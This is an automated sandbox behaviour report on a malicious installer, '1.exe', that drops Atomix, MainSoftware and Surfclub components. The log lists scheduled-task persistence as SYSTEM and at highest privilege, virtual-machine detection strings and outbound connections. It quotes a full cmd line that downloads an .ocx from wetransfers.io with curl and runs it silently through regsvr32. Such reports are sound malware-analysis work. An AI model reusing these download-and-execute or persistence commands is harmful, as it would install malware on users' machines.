    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI723B.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI71FC.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID857.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC8D.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7412.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Main\MainSoftware.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\shiB789.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\lzmaextractor.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe.partJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7050.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBBC0.tmpJump to dropped file
    Source: C:\Program Files\Surfclub\Install.exeFile created: C:\Program Files\Surfclub\Surfclub.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI727B.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE45E.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBB04.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID7F8.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC2F.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID857.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC8D.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID78A.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBBC0.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE45E.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBB04.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID7F8.tmpJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe.partJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\How to uninstall.txtJump to behavior

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Users\user\Desktop\1.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A BlobJump to behavior
    Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: 20993E10000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: 1DD50A70000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\Chop\Install.exeMemory allocated: 2842AB00000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeMemory allocated: 1E6D6FD0000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Install.exeMemory allocated: 164A27D0000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Surfclub.exeMemory allocated: 270B5F30000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Surfclub.exeMemory allocated: 25711F10000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Surfclub.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Main\MainSoftware.exeWindow / User API: threadDelayed 420Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeWindow / User API: threadDelayed 3697
    Source: C:\Program Files\Surfclub\Install.exeWindow / User API: threadDelayed 671
    Source: C:\Program Files\Surfclub\Surfclub.exeWindow / User API: threadDelayed 383
    Source: C:\Program Files\Surfclub\Surfclub.exeWindow / User API: threadDelayed 582
    Source: C:\Program Files\Surfclub\Surfclub.exeWindow / User API: threadDelayed 1140
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBC2F.tmpJump to dropped file
    Source: C:\Windows\System32\curl.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\289930.ocxJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI719C.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID78A.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6FC2.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI70ED.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7472.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7442.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\ShortcutFlags.dllJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI716C.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI713C.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI71CC.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI723B.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI71FC.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID857.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBC8D.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7412.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiB789.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\lzmaextractor.dllJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7050.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBBC0.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI727B.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE45E.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID7F8.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBB04.tmpJump to dropped file
    Source: C:\Program Files (x86)\Main\Chop\Install.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Users\user\Desktop\1.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Users\user\Desktop\1.exeAPI coverage: 7.8 %
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 5956Thread sleep count: 204 > 30Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 5956Thread sleep count: 98 > 30Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 3264Thread sleep count: 59 > 30Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 648Thread sleep count: 420 > 30Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6128Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 2992Thread sleep count: 96 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 2992Thread sleep count: 226 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 2992Thread sleep count: 62 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 5272Thread sleep count: 130 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 3568Thread sleep count: 3697 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 3140Thread sleep count: 31 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 3368Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 4264Thread sleep count: 187 > 30
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 1396Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Install.exe TID: 2336Thread sleep count: 244 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 2336Thread sleep count: 176 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 2336Thread sleep count: 671 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 4500Thread sleep count: 171 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 908Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6536Thread sleep count: 255 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6536Thread sleep count: 87 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6400Thread sleep count: 78 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6592Thread sleep count: 175 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6592Thread sleep count: 31 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6676Thread sleep count: 336 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6676Thread sleep count: 98 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6512Thread sleep count: 45 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6376Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6940Thread sleep count: 234 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6940Thread sleep count: 163 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6940Thread sleep count: 383 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6980Thread sleep count: 37 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6876Thread sleep count: 31 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6940Thread sleep count: 198 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6980Thread sleep count: 582 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6948Thread sleep count: 136 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6948Thread sleep count: 1140 > 30
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008B63A0 FindFirstFileW,GetLastError,FindClose,0_2_008B63A0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008E2630 FindFirstFileW,FindClose,CloseHandle,CloseHandle,0_2_008E2630
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_007754C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,0_2_007754C0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008DC670 FindFirstFileW,FindClose,0_2_008DC670
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008C5040 FindFirstFileW,FindClose,FindClose,0_2_008C5040
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008B5A60 FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_008B5A60
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007754C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,4_2_007754C0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00794BB0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,0_2_00794BB0
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0097F6C2 VirtualQuery,GetSystemInfo,0_2_0097F6C2
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Surfclub.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
    Source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
    Source: MainSoftware.exe, 00000009.00000002.2456317461.0000024A2CE3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009882F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009882F3
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008CCF30 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,LoadLibraryW,GetProcAddress,GetEnvironmentVariableW,SHGetPathFromIDListW,SHGetMalloc,0_2_008CCF30
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00982A8E mov esi, dword ptr fs:[00000030h]0_2_00982A8E
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00982A8E mov esi, dword ptr fs:[00000030h]4_2_00982A8E
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00982AFA GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_00982AFA
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Program Files\Surfclub\Surfclub.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00794B60 __set_se_translator,SetUnhandledExceptionFilter,0_2_00794B60
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009882F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009882F3
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0098357E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0098357E
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_009882F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_009882F3
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0098357E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0098357E
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007A1A50 __set_se_translator,SetUnhandledExceptionFilter,4_2_007A1A50
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00794B60 __set_se_translator,SetUnhandledExceptionFilter,4_2_00794B60
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D416FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00007FF7D3D416FC
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.59.228 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 34.160.111.145 80
    .NET source code references suspicious native API functions
    Source: 26.2.Surfclub.exe.2b150270000.72.raw.unpack, ActiveDirectorySite.csReference to suspicious API methods: global::Interop.Kernel32.GetProcAddress(DirectoryContext.ADHandle, "DsListDomainsInSiteW")
    Source: 26.2.Surfclub.exe.2b150270000.72.raw.unpack, Utils.csReference to suspicious API methods: global::Interop.Advapi32.OpenProcessToken(global::Interop.Kernel32.GetCurrentProcess(), 8, out phThreadToken)
    Source: 26.2.Surfclub.exe.2b150270000.72.raw.unpack, DirectoryContext.csReference to suspicious API methods: global::Interop.Kernel32.LoadLibrary(systemDirectory + "\\ntdsapi.dll")
    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="5480" CHAINERUIPROCESSID="5480Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740568836 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://p1-ag5.pages.dev?source_id=1Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /fJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f
    Source: C:\Program Files\Surfclub\Install.exeProcess created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" install https://p1-ag5.pages.dev?source_id=1
    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "c:\users\user\desktop\1.exe" /i "c:\users\user\appdata\roaming\atomix\atomix 1.0.0\install\69b1923\distributor software.msi" ai_euimsi=1 appdir="c:\program files (x86)\atomix" secondsequence="1" clientprocessid="5480" chaineruiprocessid="5480chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_detected_admin_user="1" ai_setupexepath="c:\users\user\desktop\1.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1740568836 " targetdir="c:\" ai_setupexepath_original="c:\users\user\desktop\1.exe" ai_install="1"
